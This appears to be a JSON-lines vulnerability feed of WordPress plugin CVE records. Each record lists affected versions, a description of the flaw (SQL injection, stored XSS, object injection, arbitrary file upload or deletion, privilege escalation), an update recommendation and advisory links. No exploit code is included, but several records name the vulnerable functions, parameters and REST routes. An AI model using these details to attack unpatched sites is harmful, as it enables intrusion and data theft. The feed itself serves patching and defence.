{"CVE_ID":"CVE-2025-6222","slug":"woocommerce-refund-and-exchange","versionImpact":"3.2.6","versionEndExcluding":"3.2.7","description":"The WooCommerce Refund And Exchange with RMA - Warranty Management, Refund Policy, Manage User Wallet theme for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'ced_rnx_order_exchange_attach_files' function in all versions up to, and including, 3.2.6. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"Update to version 3.2.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/woocommerce-refund-and-exchange\\\/17810207#item-description__changelog\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/woocommerce-refund-and-exchange\\\/17810207#item-description__changelog\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/35a7b5a1-b052-4390-8e08-f97aa9c16b29?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/35a7b5a1-b052-4390-8e08-f97aa9c16b29?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3392","slug":"expand-maker","versionImpact":"3.2.6.1","versionEndExcluding":"3.2.7","description":"The Read More & Accordion WordPress plugin before 3.2.7 unserializes user input provided via the settings, which could allow high-privilege users such as admin to perform PHP Object Injection when a suitable gadget is present.","recommendation":"Update to version 3.2.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1e733ccf-8026-4831-9863-e505c2aecba6\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1e733ccf-8026-4831-9863-e505c2aecba6\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12171","slug":"elex-helpdesk-customer-support-ticket-system","versionImpact":"3.2.6","versionEndExcluding":"3.2.7","description":"The ELEX WordPress HelpDesk & Customer Ticketing System plugin for WordPress is vulnerable to privilege escalation due to a missing capability check on the 'eh_crm_agent_add_user' AJAX action in all versions up to, and including, 3.2.6. This makes it possible for authenticated attackers, with Subscriber-level access and above, to create new administrative user accounts.","recommendation":"Update to version 3.2.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3227859\\\/elex-helpdesk-customer-support-ticket-system\\\/trunk\\\/includes\\\/class-crm-ajax-functions-one.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3227859\\\/elex-helpdesk-customer-support-ticket-system\\\/trunk\\\/includes\\\/class-crm-ajax-functions-one.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3213791%40elex-helpdesk-customer-support-ticket-system&new=3213791%40elex-helpdesk-customer-support-ticket-system&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3213791%40elex-helpdesk-customer-support-ticket-system&new=3213791%40elex-helpdesk-customer-support-ticket-system&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cbcd978b-e81f-4c39-b2f7-adc948d21b1b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cbcd978b-e81f-4c39-b2f7-adc948d21b1b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0659","slug":"easy-digital-downloads","versionImpact":"3.2.6","versionEndExcluding":"3.2.7","description":"The Easy Digital Downloads \u2013 Sell Digital Files (eCommerce Store & Payments Made Easy) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the variable pricing option title in all versions up to, and including, 3.2.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with shop manger-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.2.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1ec207cd-cae5-4950-bbc8-d28f108b4ae7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1ec207cd-cae5-4950-bbc8-d28f108b4ae7?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=\\\/easy-digital-downloads\\\/tags\\\/3.2.6&old=3030600&new_path=\\\/easy-digital-downloads\\\/tags\\\/3.2.7&new=3030600&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=\\\/easy-digital-downloads\\\/tags\\\/3.2.6&old=3030600&new_path=\\\/easy-digital-downloads\\\/tags\\\/3.2.7&new=3030600&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13446","slug":"workreap","versionImpact":"3.2.5","versionEndExcluding":"3.2.6","description":"The Workreap plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 3.2.5. This is due to the plugin not properly validating a user's identity prior to (1) performing a social auto-login or (2) updating their profile details (e.g. password). This makes it possible for unauthenticated attackers to (1) login as an arbitrary user if their email address is known or (2) change an arbitrary user's password, including administrators, and leverage that to gain access to their account. NOTE: This vulnerability was partially fixed in version 3.2.5.","recommendation":"Update to version 3.2.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/themeforest.net\\\/item\\\/workreap-freelance-marketplace-wordpress-theme\\\/23712454\",\"name\":\"https:\\\/\\\/themeforest.net\\\/item\\\/workreap-freelance-marketplace-wordpress-theme\\\/23712454\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/78c1308b-0849-4235-b2d6-0b1750a5614f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/78c1308b-0849-4235-b2d6-0b1750a5614f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1512","slug":"masterstudy-lms-learning-management-system","versionImpact":"3.2.5","versionEndExcluding":"3.2.6","description":"The MasterStudy LMS WordPress Plugin \u2013 for Online Courses and Education plugin for WordPress is vulnerable to union based SQL Injection via the 'user' parameter of the \/lms\/stm-lms\/order\/items REST route in all versions up to, and including, 3.2.5 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 3.2.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d6b6d824-51d3-4da9-a39a-b957368df4dc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d6b6d824-51d3-4da9-a39a-b957368df4dc?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3036794\\\/masterstudy-lms-learning-management-system\\\/trunk\\\/_core\\\/lms\\\/classes\\\/models\\\/StmStatistics.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3036794\\\/masterstudy-lms-learning-management-system\\\/trunk\\\/_core\\\/lms\\\/classes\\\/models\\\/StmStatistics.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-8213","slug":"ninjascanner","versionImpact":"3.2.5","versionEndExcluding":"3.2.6","description":"The NinjaScanner \u2013 Virus & Malware scan plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the 'nscan_ajax_quarantine' and 'nscan_quarantine_select' functions in all versions up to, and including, 3.2.5. This makes it possible for authenticated attackers, with Administrator-level access and above, to delete arbitrary files on the server, including files outside the WordPress root directory.","recommendation":"Update to version 3.2.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ninjascanner\\\/trunk\\\/lib\\\/ajax_hooks.php#L331\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ninjascanner\\\/trunk\\\/lib\\\/ajax_hooks.php#L331\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ninjascanner\\\/trunk\\\/lib\\\/tab_quarantine.php#L114\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ninjascanner\\\/trunk\\\/lib\\\/tab_quarantine.php#L114\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3336569\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3336569\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6b1da345-ddbb-48ad-b0c1-bb0cb3b0fc69?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6b1da345-ddbb-48ad-b0c1-bb0cb3b0fc69?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8871","slug":"easy-pricing-tables","versionImpact":"3.2.5","versionEndExcluding":"3.2.6","description":"The Pricing Tables WordPress Plugin \u2013 Easy Pricing Tables plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 3.2.5. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 3.2.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a5e4f40b-c028-4283-ba02-c77408136713?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a5e4f40b-c028-4283-ba02-c77408136713?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-pricing-tables\\\/trunk\\\/includes\\\/ept-block.php#L304\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-pricing-tables\\\/trunk\\\/includes\\\/ept-block.php#L304\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-pricing-tables\\\/trunk\\\/includes\\\/notices\\\/notices.php#L91\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-pricing-tables\\\/trunk\\\/includes\\\/notices\\\/notices.php#L91\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10637","slug":"kadence-blocks","versionImpact":"3.2.53","versionEndExcluding":"3.2.54","description":"The Gutenberg Blocks with AI by Kadence WP  WordPress plugin before 3.2.54 does not validate and escape some of its block options before outputting them back in a page\/post where the block is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","recommendation":"Update to version 3.2.54, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/df688dcc-9617-4f58-a310-891bfaea3695\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/df688dcc-9617-4f58-a310-891bfaea3695\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/df688dcc-9617-4f58-a310-891bfaea3695\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/df688dcc-9617-4f58-a310-891bfaea3695\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12581","slug":"kadence-blocks","versionImpact":"3.2.53","versionEndExcluding":"3.2.54","description":"The Gutenberg Blocks with AI by Kadence WP \u2013 Page Builder Features plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 3.2.53 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","recommendation":"Update to version 3.2.54, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/research.cleantalk.org\\\/cve-2024-10637\\\/\",\"name\":\"https:\\\/\\\/research.cleantalk.org\\\/cve-2024-10637\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/df688dcc-9617-4f58-a310-891bfaea3695\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/df688dcc-9617-4f58-a310-891bfaea3695\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/406f3eaf-44a7-4e32-a620-8799eb74742a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/406f3eaf-44a7-4e32-a620-8799eb74742a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4939","slug":"salesmanago","versionImpact":"3.2.4","versionEndExcluding":"3.2.5","description":"The SALESmanago plugin for WordPress is vulnerable to Log Injection in versions up to, and including, 3.2.4. This is due to the use of a weak authentication token for the \/wp-json\/salesmanago\/v1\/callbackApiV3 API endpoint which is simply a SHA1 hash of the site URL and client ID found in the page source of the website. This makes it possible for unauthenticated attackers to inject arbitrary content into the log files, and when combined with another vulnerability this could have significant consequences.","recommendation":"Update to version 3.2.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/salesmanago\\\/trunk\\\/src\\\/Includes\\\/Helper.php#L376\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/salesmanago\\\/trunk\\\/src\\\/Includes\\\/Helper.php#L376\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/salesmanago\\\/trunk\\\/src\\\/Admin\\\/Controller\\\/CallbackController.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/salesmanago\\\/trunk\\\/src\\\/Admin\\\/Controller\\\/CallbackController.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/de7db1d6-b352-44c7-a6cc-b21cb65a0482?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/de7db1d6-b352-44c7-a6cc-b21cb65a0482?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-8289","slug":"wpcf7-redirect","versionImpact":"3.2.4","versionEndExcluding":"3.2.5","description":"The Redirection for Contact Form 7 plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 3.2.4 via deserialization of untrusted input in the delete_associated_files function. This makes it possible for unauthenticated attackers to inject a PHP Object. This vulnerability may be exploited by unauthenticated attackers when a form is present on the site with a file upload action, and doesn't affect sites with PHP version > 8. This vulnerability also requires the 'Redirection For Contact Form 7 Extension - Create Post' extension to be installed and activated in order to be exploited. No known POP chain is present in the vulnerable software, which means this vulnerability has no impact unless another plugin or theme containing a POP chain is installed on the site. If a POP chain is present via an additional plugin or theme installed on the target system, it may allow the attacker to perform actions like delete arbitrary files, retrieve sensitive data, or execute code depending on the POP chain present. We confirmed there is a usable gadget in Contact Form 7 plugin that makes arbitrary file deletion possible when installed with this plugin. Given Contact Form 7 is a requirement of this plugin, it is likely that any site with this plugin and the 'Redirection For Contact Form 7 Extension - Create Post' extension enabled is vulnerable to arbitrary file deletion.","recommendation":"Update to version 3.2.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpcf7-redirect\\\/tags\\\/3.2.4\\\/classes\\\/class-wpcf7r-save-files.php#L80\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpcf7-redirect\\\/tags\\\/3.2.4\\\/classes\\\/class-wpcf7r-save-files.php#L80\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c7909b75-8087-4d38-8325-c619bf84d997?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c7909b75-8087-4d38-8325-c619bf84d997?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-8145","slug":"wpcf7-redirect","versionImpact":"3.2.4","versionEndExcluding":"3.2.5","description":"The Redirection for Contact Form 7 plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 3.2.4 via deserialization of untrusted input in the get_lead_fields function. This makes it possible for unauthenticated attackers to inject a PHP Object. The additional presence of a POP chain in a Contact Form 7 plugin allows attackers to delete arbitrary files. Additionally, in certain server configurations, Remote Code Execution is possible","recommendation":"Update to version 3.2.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpcf7-redirect\\\/tags\\\/3.2.3\\\/classes\\\/class-wpcf7r-lead.php#L144\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpcf7-redirect\\\/tags\\\/3.2.3\\\/classes\\\/class-wpcf7r-lead.php#L144\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2cb275d5-ec4b-419f-84e1-84172d381411?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2cb275d5-ec4b-419f-84e1-84172d381411?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-41804","slug":"astra-pro-sites","versionEndExcluding":"3.2.5","description":"Server-Side Request Forgery (SSRF) vulnerability in Brainstorm Force Starter Templates \u2014 Elementor, WordPress & Beaver Builder Templates.This issue affects Starter Templates \u2014 Elementor, WordPress & Beaver Builder Templates: from n\/a through 3.2.4.\n\n","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/astra-sites\\\/wordpress-starter-templates-plugin-3-2-4-server-side-request-forgery-ssrf-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/astra-sites\\\/wordpress-starter-templates-plugin-3-2-4-server-side-request-forgery-ssrf-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-8141","slug":"wpcf7-redirect","versionImpact":"3.2.4","versionEndExcluding":"3.2.5","description":"The Redirection for Contact Form 7 plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the delete_associated_files function in all versions up to, and including, 3.2.4. This makes it possible for unauthenticated attackers to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php).","recommendation":"Update to version 3.2.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpcf7-redirect\\\/tags\\\/3.2.3\\\/classes\\\/class-wpcf7r-save-files.php#L80\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpcf7-redirect\\\/tags\\\/3.2.3\\\/classes\\\/class-wpcf7r-save-files.php#L80\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fafd0159-25ab-430d-88ef-c4d09d23baa7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fafd0159-25ab-430d-88ef-c4d09d23baa7?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8325","slug":"blockspare","versionImpact":"3.2.4","versionEndExcluding":"3.2.5","description":"The Blockspare: Gutenberg Blocks & Patterns for Blogs, Magazines, Business Sites \u2013 Post Grids, Sliders, Carousels, Counters, Page Builder & Starter Site Imports, No Coding Needed plugin for WordPress is vulnerable to Stored Cross-Site Scripting via several parameters in the \u2018blockspare_render_social_sharing_block\u2019 function in all versions up to, and including, 3.2.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.2.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c23995c6-989e-48d2-ba60-b0bf7b750245?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c23995c6-989e-48d2-ba60-b0bf7b750245?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3145729\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3145729\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13479","slug":"ltl-freight-quotes-sefl-edition","versionImpact":"3.2.4","versionEndExcluding":"3.2.5","description":"The LTL Freight Quotes \u2013 SEFL Edition plugin for WordPress is vulnerable to SQL Injection via the 'dropship_edit_id' and 'edit_id' parameters in all versions up to, and including, 3.2.4 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 3.2.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3242634%40ltl-freight-quotes-sefl-edition&new=3242634%40ltl-freight-quotes-sefl-edition&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3242634%40ltl-freight-quotes-sefl-edition&new=3242634%40ltl-freight-quotes-sefl-edition&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8322fe81-2c2f-4aa6-b08f-fa5c16e62218?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8322fe81-2c2f-4aa6-b08f-fa5c16e62218?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6810","slug":"clickcease-click-fraud-protection","versionImpact":"3.2.4","versionEndExcluding":"3.2.5","description":"The ClickCease Click Fraud Protection plugin for WordPress is vulnerable to unauthorized access of data due to an improper capability check on the get_settings function in all versions up to, and including, 3.2.4. This makes it possible for authenticated attackers, with author access and above, to retrieve the plugin's configured API keys.","recommendation":"Update to version 3.2.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5d572cac-b8e3-4c52-9b35-80fe5ee9e900?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5d572cac-b8e3-4c52-9b35-80fe5ee9e900?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3081436\\\/clickcease-click-fraud-protection\\\/trunk\\\/classes\\\/routes.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3081436\\\/clickcease-click-fraud-protection\\\/trunk\\\/classes\\\/routes.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5819","slug":"kadence-blocks","versionImpact":"3.2.45","versionEndExcluding":"3.2.46","description":"The Gutenberg Blocks with AI by Kadence WP \u2013 Page Builder Features plugin for WordPress is vulnerable to DOM-based Stored Cross-Site Scripting via HTML data attributes in all versions up to, and including, 3.2.45 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.2.46, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c7457ce7-8471-415d-8e34-4505aa34fd61?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c7457ce7-8471-415d-8e34-4505aa34fd61?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3108332\\\/kadence-blocks\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3108332\\\/kadence-blocks\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10892","slug":"cost-calculator-builder","versionImpact":"3.2.42","versionEndExcluding":"3.2.43","description":"The Cost Calculator Builder WordPress plugin before 3.2.43 does not have CSRF checks in some AJAX actions, which could allow attackers to make logged in users perform unwanted actions via CSRF attacks.","recommendation":"Update to version 3.2.43, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ff1f5b84-a8cf-4574-a713-53d35739c6cb\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ff1f5b84-a8cf-4574-a713-53d35739c6cb\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5289","slug":"kadence-blocks","versionImpact":"3.2.42","versionEndExcluding":"3.2.43","description":"The Gutenberg Blocks with AI by Kadence WP \u2013 Page Builder Features plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Google Maps widget parameters in all versions up to, and including, 3.2.42 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.2.43, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f9c0ad1e-380e-4b67-b07e-70bf44e4e614?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f9c0ad1e-380e-4b67-b07e-70bf44e4e614?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/kadence-blocks\\\/tags\\\/3.2.38\\\/includes\\\/blocks\\\/class-kadence-blocks-googlemaps-block.php#L226\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/kadence-blocks\\\/tags\\\/3.2.38\\\/includes\\\/blocks\\\/class-kadence-blocks-googlemaps-block.php#L226\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/kadence-blocks\\\/tags\\\/3.2.42\\\/includes\\\/blocks\\\/class-kadence-blocks-googlemaps-block.php#L237\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/kadence-blocks\\\/tags\\\/3.2.42\\\/includes\\\/blocks\\\/class-kadence-blocks-googlemaps-block.php#L237\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10034","slug":"simply-gallery-block","versionImpact":"3.2.4.2","versionEndExcluding":"3.2.4.3","description":"The Gallery Blocks with Lightbox. Image Gallery, (HTML5 video , YouTube, Vimeo) Video Gallery and Lightbox for native gallery plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the gallery link text parameter in all versions up to, and including, 3.2.4.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Editor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.2.4.3, or a newer patched 